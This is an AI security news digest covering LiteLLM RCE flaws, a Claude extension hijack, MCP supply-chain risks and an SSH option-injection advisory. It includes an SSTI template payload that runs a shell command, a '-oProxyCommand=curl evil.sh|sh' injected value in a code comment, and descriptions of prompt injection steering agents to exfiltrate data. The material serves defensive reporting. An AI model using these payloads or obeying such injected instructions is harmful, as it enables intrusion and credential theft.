AI Sec Watch (aisecwatch.com)

The security intelligence platform for AI teams

Real-time AI security monitoring: tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

AI security threats move fast and get buried under hype and noise. AI Sec Watch is built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

Maintained by Truong (Jack) Luu, Information Systems Researcher.

Total tracked: 3,710 · Last 24 hours: 1 · Last 7 days: 1
Daily Briefing · Friday, May 8, 2026

Critical RCE Vulnerabilities in LiteLLM Proxy Server: LiteLLM, a proxy server that forwards requests to AI model APIs, disclosed three flaws, two critical and one high severity, affecting versions 1.74.2 through 1.83.6. Two test endpoints allowed attackers with valid API keys to execute arbitrary code (run any commands they want) on the server by submitting malicious configurations or prompt templates that were rendered without sandboxing (CVE-2026-42271 and CVE-2026-42203, both critical), while a SQL injection flaw (inserting malicious code into database queries) let unauthenticated attackers read or modify stored API credentials (CVE-2026-42208, high).
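
The prompt-template flaw is an instance of server-side template injection. The sketch below is a hedged illustration of the class, assuming a plain Jinja2 renderer rather than LiteLLM's actual endpoints: rendering an untrusted template without a sandbox executes attacker code, while a sandboxed environment refuses the same probe.

```python
# Minimal sketch of the unsandboxed-template failure mode described above.
# Plain Jinja2 for illustration -- NOT LiteLLM's actual code or endpoints.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Classic SSTI probe: walks from a harmless template global (cycler) up to
# the os module and runs a shell command during rendering.
payload = "{{ cycler.__init__.__globals__.os.popen('echo pwned').read() }}"

# Unsandboxed rendering executes the command -- this is the RCE class.
print(Environment().from_string(payload).render())        # -> pwned

# A sandboxed environment blocks dunder-attribute access instead.
try:
    SandboxedEnvironment().from_string(payload).render()
except SecurityError as exc:
    print("sandbox refused:", exc)
```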

ClaudeBleed Exploit Allows Extension Hijacking in Chrome: Anthropic's Claude browser extension contains a vulnerability that allows malicious Chrome extensions to hijack it and perform unauthorized actions like exfiltrating files, sending emails, or stealing code from private repositories. The flaw stems from the extension trusting any script from claude.ai without verifying the actual caller, and while Anthropic released a partial fix in version 1.0.70 on May 6, researchers report it remains exploitable when the extension runs in privileged mode.

AI Systems Show Triple the High-Risk Vulnerabilities of Legacy Software: Penetration testing data reveals that AI and LLM systems have 32% of findings rated high-risk, compared with just 13% for traditional software, and that only 38% of high-risk AI issues get resolved. Security experts attribute the gap to rapid deployment without mature controls, novel attack surfaces like prompt injection (tricking AI by hiding instructions in input), and fragmented responsibility for remediation across teams.

Model Context Protocol Emerging as a Critical Security Blind Spot: Model Context Protocol (MCP, a plugin system connecting AI agents to external tools) has become a major vulnerability vector as organizations fail to scan for or monitor MCP-related risks. Recent supply chain attacks, such as the postmark-mcp npm package that exfiltrated emails from 300 organizations, demonstrate how attackers exploit widely trusted MCP packages and hardcoded credentials in AI configurations to enable credential theft and supply chain compromise at scale.
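
As a concrete picture of the control the item above says is missing, here is a minimal sketch that flags hardcoded credentials in an `mcpServers`-style JSON config. The file layout, key names, and regexes are assumptions for illustration, not a vetted scanner.

```python
# Toy scanner for the missing control described above: flag literal secrets
# in the env blocks of an "mcpServers"-style JSON config. Key names, file
# layout, and regexes are illustrative assumptions, not a vetted tool.
import json
import re
import sys

SECRET_KEY_RE = re.compile(r"key|token|secret|password|credential", re.I)
ENV_REF_RE = re.compile(r"^\$\{?[A-Z_][A-Z0-9_]*\}?$")  # ${VAR} / $VAR refs are fine

def find_hardcoded_secrets(path: str) -> list[tuple[str, str]]:
    """Return (server, env var) pairs whose value looks like a literal secret."""
    with open(path, encoding="utf-8") as f:
        config = json.load(f)
    findings = []
    for server, spec in config.get("mcpServers", {}).items():
        for key, value in spec.get("env", {}).items():
            if (SECRET_KEY_RE.search(key)
                    and isinstance(value, str) and value
                    and not ENV_REF_RE.match(value)):
                findings.append((server, key))
    return findings

if __name__ == "__main__":
    for server, key in find_hardcoded_secrets(sys.argv[1]):
        print(f"[!] {server}: {key} appears to hold a hardcoded credential")
```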

Latest Intel

01

Has Google’s AI watermarking system been reverse-engineered?

security
Apr 14, 2026

A developer claims to have reverse-engineered Google DeepMind's SynthID system, which is a watermarking technology that embeds hidden marks in AI-generated images to prove their origin. The developer says they can strip these watermarks from images or add fake ones, though Google disputes this claim.

The Verge (AI)
02

Byzantine-Robust Asynchronous Federated Learning via Feature Fingerprinting

research · security
Apr 14, 2026

Asynchronous federated learning (AFL, where multiple devices train a shared AI model without waiting for each other to finish) is faster than synchronous methods but more vulnerable to Byzantine attacks (when some devices send false or corrupted data to sabotage the model). Researchers propose Belisa, a framework that uses feature fingerprints (unique patterns in how local models represent data) to identify and filter out malicious devices, improving robustness and efficiency in real-world scenarios where devices have different data and hardware capabilities.

Fix: The source proposes Belisa as a Byzantine-robust AFL framework that addresses this vulnerability. Belisa works by leveraging a reference model trained on publicly available data to quantify feature fingerprints (discrepancies between feature representations of local models) and filtering out malicious models through clustering. According to the paper, Belisa lowered average test error rates to 0.42x that of baseline methods under attack scenarios and accelerated aggregation by an average of 12.3x compared to other methods.
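
To make the fingerprint-and-filter idea concrete, here is a toy sketch under stated assumptions: NumPy-only code that is not the paper's Belisa implementation, with a robust median/MAD outlier rule standing in for Belisa's clustering step and model updates standing in for feature representations.

```python
# Toy sketch of fingerprint-based filtering -- an illustration of the idea,
# not the paper's Belisa implementation. A median/MAD outlier rule stands
# in for the clustering step; all names here are assumptions.
import numpy as np

def feature_fingerprint(local_feats: np.ndarray, ref_feats: np.ndarray) -> float:
    """Discrepancy between a client's features and the reference model's
    features on the same public probe batch (smaller = more trustworthy)."""
    return float(np.linalg.norm(local_feats - ref_feats))

def filter_and_aggregate(updates, fingerprints, z_thresh=3.5):
    """Drop clients whose fingerprint is a robust outlier, then average."""
    fp = np.asarray(fingerprints)
    med = np.median(fp)
    mad = np.median(np.abs(fp - med)) + 1e-12
    keep = np.abs(fp - med) / mad < z_thresh
    survivors = [u for u, k in zip(updates, keep) if k]
    return np.mean(survivors, axis=0), keep

# Toy run: 8 honest clients near the true update, 2 Byzantine clients far off.
rng = np.random.default_rng(0)
truth = rng.normal(size=16)
updates = [truth + rng.normal(scale=0.1, size=16) for _ in range(8)]
updates += [truth + 50.0, truth - 50.0]               # poisoned updates
fingerprints = [feature_fingerprint(u, truth) for u in updates]  # truth = reference
aggregate, keep = filter_and_aggregate(updates, fingerprints)
print(f"kept {int(keep.sum())}/{len(updates)} clients")
```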

IEEE Xplore (Security & AI Journals)
03

‘Mythos-Ready’ Security: CSA Urges CISOs to Prepare for Accelerated AI Threats

security · safety
Apr 14, 2026

AI models like Mythos are making cyberattacks faster and more dangerous by shortening the time between when security flaws are discovered and when attackers exploit them. Security leaders (CISOs, chief information security officers) need to prepare urgently for this new threat environment where attacks happen at high speed.

SecurityWeek
04

AI companies make powerful tech – but they’re also savvy marketers

industry
Apr 14, 2026

This article discusses how AI companies like Anthropic use marketing to promote their capabilities, using Claude as an example of technology that may be overhyped despite being genuinely advanced. The piece cautions readers against getting swept up in marketing claims about AI's power without critical evaluation.

The Guardian Technology
05

How AI is transforming threat detection

industry
Apr 14, 2026

AI is transforming threat detection by processing massive amounts of security data and identifying suspicious patterns faster than humans alone, with 50% of threat detection platforms expected to use agentic AI (AI systems that can take independent actions) by 2028. Organizations are already automating routine tasks like alert review and investigation work, seeing 40-50% efficiency gains for lower-level security operations, while AI agents reduce alert fatigue by clustering similar alerts and prioritizing them based on risk.

CSO Online
06

The AI inflection point: What security leaders must do now

security · industry
Apr 14, 2026

AI is moving from experimentation to production deployment in cybersecurity, and security leaders must treat it as a fundamental shift in how security operations work, not just an added tool. Attackers are using AI to conduct faster intrusions (some occurring in under 30 seconds), which exceeds the speed of human-only security responses, making AI deployment urgent for defenders. There is currently a limited window where defenders and attackers have roughly equal access to AI technology, but advantage will go to those who operationalize it most effectively and quickly.

CSO Online
07

Man charged with attempted murder over attack on home of OpenAI's Sam Altman

security
Apr 13, 2026

A 20-year-old Texas man has been charged with attempted murder and additional federal felonies after allegedly throwing a Molotov cocktail (a homemade incendiary weapon) at OpenAI CEO Sam Altman's San Francisco home and attempting to set fire to OpenAI's headquarters. Authorities found the suspect carrying documents opposing AI development and calling for violence against AI executives and investors. OpenAI and law enforcement officials condemned the attack, with OpenAI calling for disagreement over AI to be settled through democratic debate rather than violence.

BBC Technology
08

GHSA-p4h8-56qp-hpgv: SSH/SCP option injection allowing local RCE in @aiondadotcom/mcp-ssh

security
Apr 13, 2026

An SSH/SCP option injection vulnerability in the @aiondadotcom/mcp-ssh library allowed attackers to execute arbitrary commands locally on the machine running the MCP server (a tool that connects an AI to external systems). By crafting malicious input like `-oProxyCommand=...`, attackers could trick SSH into running their code before any network connection happened, potentially stealing SSH keys and credentials. The vulnerability could be triggered even without a malicious user, since an LLM (large language model) could be tricked through prompt injection (hiding attacker instructions in text it reads) to pass the malicious input to the tool.

Fix: Fixed in version 1.3.5. The patch includes: adding `--` argument terminators to all SSH/SCP invocations (which tells the command where options end and arguments begin), implementing a strict whitelist for host aliases that rejects leading dashes and shell metacharacters, requiring all host aliases to be defined in `~/.ssh/config` or `~/.ssh/known_hosts`, and resolving `ssh.exe`/`scp.exe` to absolute paths with `shell: false` on Windows to prevent command re-parsing. No workarounds exist; users must upgrade to 1.3.5.
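
The bug class and the fix generalize beyond this package. Below is an illustrative Python sketch, assumed code rather than the actual (JavaScript) patch, showing why a dash-prefixed host alias becomes an SSH option and how a `--` terminator plus a strict host whitelist closes the hole.

```python
# Illustrative sketch of the option-injection bug class and the hardening
# described above -- assumed code, not the @aiondadotcom/mcp-ssh patch.
import re
import subprocess

def run_ssh_vulnerable(host: str, command: str) -> None:
    # BAD: a "host" like "-oProxyCommand=curl evil.sh|sh" is parsed by ssh
    # as an option, and ProxyCommand runs locally before any connection.
    subprocess.run(["ssh", host, command], check=True)

# No leading dash, no shell metacharacters: mirrors the advisory's whitelist.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.\-]*")

def run_ssh_hardened(host: str, command: str) -> None:
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected suspicious host alias: {host!r}")
    # "--" ends option parsing, so a dash-prefixed host can't become an option.
    # Passing an argument list (not a string) also avoids shell re-parsing,
    # the same goal as the patch's shell: false on Windows.
    subprocess.run(["ssh", "--", host, command], check=True)

if __name__ == "__main__":
    try:
        run_ssh_hardened("-oProxyCommand=touch /tmp/pwned", "id")
    except ValueError as exc:
        print(exc)
```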

GitHub Advisory Database
09

Daniel Moreno-Gama is facing federal charges for attacking Sam Altman’s home and OpenAI’s HQ

security
Apr 13, 2026

Daniel Moreno-Gama was arrested and charged with federal crimes after traveling from Texas to California and attacking OpenAI's facilities and CEO Sam Altman's home with a Molotov cocktail (an incendiary weapon made from a bottle of flammable liquid). He also attempted to break into OpenAI's headquarters and stated he intended to burn down the building and kill people inside. His charges include attempted destruction of property using explosives and illegal possession of a firearm.

The Verge (AI)
10

Trusted access for the next era of cyber defense

security · policy
Apr 13, 2026

OpenAI is expanding its Trusted Access for Cyber (TAC) program to provide AI tools to thousands of cybersecurity defenders and teams protecting critical software. The company has created GPT-5.4-Cyber, a specialized version of its AI model designed specifically for defensive cybersecurity work, and is implementing cyber-specific safeguards (built-in restrictions to prevent misuse) in model deployments. This effort aims to help defenders find and fix security vulnerabilities faster while preventing attackers from misusing the same AI capabilities.

Fix: The source explicitly mentions the following measures: cyber-specific safeguards included in model deployments starting in 2025; the Preparedness Framework (strengthened in 2023); identity verification and KYC (know-your-customer, a process to confirm who someone is) to control access to advanced capabilities; Codex Security tool to identify and fix vulnerabilities at scale; iterative deployment with continuous updates to models and safety systems based on learning about capabilities and risks; and improvements in resilience to jailbreaks (techniques that try to bypass AI safety restrictions) and other adversarial attacks.

OpenAI Blog